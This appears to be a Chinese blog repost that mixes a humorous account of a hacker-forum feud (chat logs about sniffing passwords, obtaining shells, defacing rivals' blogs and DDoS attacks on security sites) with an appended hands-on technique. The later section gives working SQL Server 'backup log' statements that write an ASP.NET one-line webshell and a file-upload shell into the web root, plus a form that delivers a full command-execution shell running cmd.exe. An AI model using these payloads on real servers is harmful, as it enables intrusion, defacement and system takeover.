热血青年 12:27:47 我不稀罕 没兴趣
热血青年 12:28:17 他的密码我上个月早就sniffer抓倒了
xxx 12:28:25 http://www.*****.com/readme.txt
xxx 12:28:34 我从网站入手的
xxx 12:28:51 送你个工具
热血青年 12:28:53 新闻管理系统后台?
xxx 12:29:10 不知道,我直接得到SHELL了
xxx 12:29:19 cmsmanage/
热血青年 12:29:19 垃圾程序一大堆 是可以有利用的 之前 后来换了服务器不支持aspx bbs那边就没戏了
xxx 12:29:23 好像是这吧
热血青年 12:29:29 噢 知道了 没注意 一大堆垃圾拼起来的
xxx 12:29:45 呵呵
xxx 12:29:56 http://www.*****.com/admin.asp
xxx 12:30:06 本来没想进的,看到这个页面气得我啊。。
热血青年 12:30:30 呵呵 小p孩子
热血青年 12:30:44 我再写个文章 写完了给你 安焦我贴了点了 十几页写的老子累死了
xxx 12:31:01 谢谢了
xxx 12:31:55 靠,看到了,他17岁能开发程序,我16就能,日
xxx 12:32:14 记得那时只会一个MessageBox,呵呵

http://www.*****.com/admin.asp 这个页面是什么东东呢?能让人看的气???
下面是原文 我贴出来慰安下各位fans~~~~~
我的天啊,大黑客。你不要传这么多后门好么?去黑我的站吧。。。。 http://www.kaonima.com

上面这话真是经典啊!!!

继续上面的接着写,第二天,功夫不负有心人,后台blog的admin的用户密码抓到了,ok
克劳德:admin的密码抓到了,你的黑页做好了没有哟?等朽木ftp登陆 懒的等了,直接到blog后台改他首页 ,给他点教训吧
克劳德:黑页怎么写?
13Bean:黑页上就写:就这水平,你也去给人家做安全,先把自己的裤子穿好再说,免的让人笑话,by 克劳德 and 13Bean
克劳德:好哟,他搞安全算见了鬼了
13Bean:你等等,我搞个cool一点的黑页发你 ,替换*****.com的用这个 朽木的怎么搞?
克劳德:朽木的我来搞撒,你去黑*****.com撒!
克劳德:我再朽木的首页上来了个自白,哈哈

这段时间装B真累啊!!!!

老子都说了,老子是个天才,僵尸军团,NBSI 都是老子开发出来的,怎么现在的这些安全界的牛人都非要说我假冒呢?老子17岁没有就能开发vc的程序,中国有几个人有我这水平,偏偏这群人不信,分明是嫉妒老子的天分,和这些人鬼扯,真tmd心烦,难道我的黑客水平值得怀疑么??现在中国搞安全的谁不晓得老子靠别人种的木马入侵了腾讯呢?非要诋毁老子的名声,真tmd不厚道!过几天老子的网络公司开出来了,赚了大钱,看你们怎么说,北大清华算个鸟,请老子去读老子都不稀罕呢,老子要读就要读加州大学!

对了,告诉你们,老子******的!

13Bean:靠 还真有你的,说出了他的心声,抓图留念啊!!!
克劳德:肯定抓了图的撒,你的*****抓了图没有
13Bean:抓了,快去炒作啊,去天涯,黑基,安焦,华夏…
克劳德:黑基华夏注册要邀请码啊,我没帐号
13Bean:那去天涯去安焦炒作撒
克劳德:你看了邪恶八进制的水贴没有?冰雪封情说他的站27号被人ddos哟???据说还是2.5G的流量,还是省网帮忙吸收了一半了哟
13Bean:狗屁,他以为他是谁,还给他2.5G的独享带宽?
克劳德:你看看这里,朽木还说他28号blog被人ddos了一天了,完全是放屁哟,我刚才去他blog上看了下,28号,从早到晚 每隔一两个小时都有他的偶像到他的blog上留言要支持他,这不完全是再喊冤么???
13Bean:八成邪恶和朽木再装
克劳德:嗯

就这样安焦水区被俺们2个弄的风雨大作,不得安宁,当天 28号下午,再炒作到了高潮后,下午快下班前,我再公司访问安焦已经很慢很慢了,页面打开后,图片一直不显示,很明显,这个时候有人就再ddos攻击安焦了,至于是谁?我想,安焦水区里面被人如同过街老鼠骂来骂去骂的无话可说的人一定最清楚是谁再ddos安焦吧?

更可笑的是,安焦被ddos后(这个我可以确认,28号下午安焦的服务器访问就很异常了),至于邪恶八进制和朽木的blog被d ,我不想说什么,至少再28号晚上安焦被d的彻底无法访问之前,我还没有说访问的时候服务器拒绝服务的情况。

更更可笑的是,好像29还是30号,邪恶八进制和朽木的blog也无法访问了,31号吧?好像是被d几天后,安焦的dns指向了127.0.0.1

然后,更更更可笑的是,邪恶八进制和朽木的色狼网的dns地址都指向了127.0.0.1,默契的不能再默契了

下面来个精彩内幕,我个人写新的比较累了,就来个转贴野路子上的吧,

XFOCUS被人DOS后,一个叫EST(邪恶八进制)的地方也高调宣称自己被人拒绝服务攻击,并且提供了几个数据:
流量高达2.5G,并且还是在“省里面已经吸收了一半”的情况下的流量。(by sunware)
攻击者调集了5000-10000台机器群起攻击EST。(by 冰血封情)
今天有个哥们告诉我,改过hosts文件,是可以访问的。俺也就在C:\windows\system32\drivers\etc\hosts文件中加了一行:
219.146.145.164 forum.eviloctal.com
果然,访问这个EST,嗖嗖的快。

顺便跟EST的人说一句:料都给人爆了,DNS就指回来吧 :)

呵呵,上述权当笑话,给路人笑笑算了,大家不要怨恨任何人,某些人喜欢d就让他d吧,一直d到他的头发白了,让他自己反省反省,自己这辈子做的最骄傲的事就是:我把安焦给d了,导致安焦被迫关闭网站n多天,我真tmd伟大!!!

这件事,看了不少所谓的内幕笑话了,不知道笑话的当事人,有没有想想,自己为何被人笑话?

整篇文章写的比较散乱,时间上可能错落的比较厉害。但所有的都是真实的,没有任何扭曲,文中引用了一些别人的话,再这里我声明:所有的话均是原话,我本人没有任何扭曲,也请大家不要相信我文中的片面之言,权当笑话娱乐娱乐。

在此克劳德和13Bean谢过各位fans了,至于有些人要骂人,请不要咒骂我的母亲,我代表全国妇联谢过了。如果真要骂,请在骂的时候想想,你的生命是你的母亲带给你的?骂人的时候携家带口的就算了,真的带上对方母亲骂人,我只能说一句话:你这个人很没有素质,不懂得尊重生命!

PS:本文来自安全焦点论坛,原文作者 cloudx,我们转载已经以***代替原先网站地址或其它,向文中牵涉到的所有人名以及网站说声谢谢。希望我们转载此文不会影响到您的心情,祝愿大家一生平安,身体健康。

————————————————————————————————-
alter database pubs set RECOVERY FULL–
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ')
backup log pubs to disk = 'd:\test11.aspx'

//这个和asp的一样,客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。

//mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)

<form action=http://192.168.2.100/asp/mu.aspx method=post>
<b>在下面输入大马内容:</b><br>
<textarea name=l cols=120 rows=35 width=45>
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script><html><head>
<title>ASP.NET Shell for WebAdmin2.X Final</title>
<meta http-equiv="Content-Type" c /></head><body>
<form runat="server">
<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">;Program</asp:Label>
<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br />
<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox><br />
<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button><p>
<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label> </p></form></body></html>
</textarea><BR><center><br>
<input type=submit value=提交>

2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:

程序代码

drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>')
backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • wsclon

    一句话,真TMD长,看到我想吐,权当娱乐,终于看完了。

  • cao1201

    啊!终于看完了! :idea:

  • LOVEBOBY

    搞笑。。。。。

  • LOVEBOBY

    对了 还有谢谢你的webgame最终幻想的源码

    虽然偶是傻瓜。。但是 一个工会的会员 却都是高手

    汗颜~

发表评论